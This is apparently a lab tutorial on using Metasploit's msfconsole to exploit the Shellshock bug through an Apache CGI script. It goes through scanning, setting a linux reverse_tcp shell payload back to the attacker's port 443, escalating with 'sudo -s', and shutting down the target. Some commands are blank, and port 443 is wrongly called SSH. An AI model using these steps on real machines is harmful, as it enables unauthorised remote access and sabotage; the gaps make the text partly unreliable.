Metasploit using msfconsole


Shut down target machine using metasploit


  1. run msfconsole on kali terminal using
  2. check the vulnerability of the target machine by using auxiliary scanner tool on msfconsole by typing
    use auxiliary/scanner/http/apache_mod_cgi_bash_env

    and type

    show options

    to show the options and see the requirements

  3. on the requirements, RHOSTS and TARGETURI needs to be filled, RHOSTS needs to be filled with the target ip address, and TARGETURI needs to be filled with /cgi-bin/status, which the terminal command runs on.type
    set RHOSTS target.ip.address

    to set the RHOSTS, and

    set TARGETURI /cgi-bin/status

    to set the TARGETURI to /cgi-bin/status

  4. now run



    to see if the target is vulnerable. If the target is vulnerable, it will return the information of the target.

  5. Now that the target is vulnerable, we use the exploit bash on msfconsole by typing
    use exploit/multi/http/apache_mod_cgi_bash_env_exec

    and type

    show options

    to show the options and see the requirements

  6. repeat step 3 by fulfilling the RHOSTS and TARGETURI with target ip address and /cgi-bin/status correspondingly.
  7. we need to set the payload that will be sent into linux shell reverse tcp, to do so, type
    set payload linux/x86/shell/reverse_tcp
  8. when we type
    show options

    it will show the payload options and field needed to be fulfilled. the LHOST and LPORT fields need to be filled with your machine ip, where the packet will be sent from, and the port of your machine, 443, the ssh. To do so, type

    set LHOST your.ip.address


    set LPORT 443
  9. to run and send the payload to the target machine, type

    if the connection is successful, it will result in open a session between the your local machine and its port, for example and the target machine and its port, for example

    we can try to check the connection by typing


    to check whether the ip matches the one shown by msfconsole

  10. to shut down the target machine, type
    sudo -s

    to gain the privilege of the root access

    to shut down the machine, type


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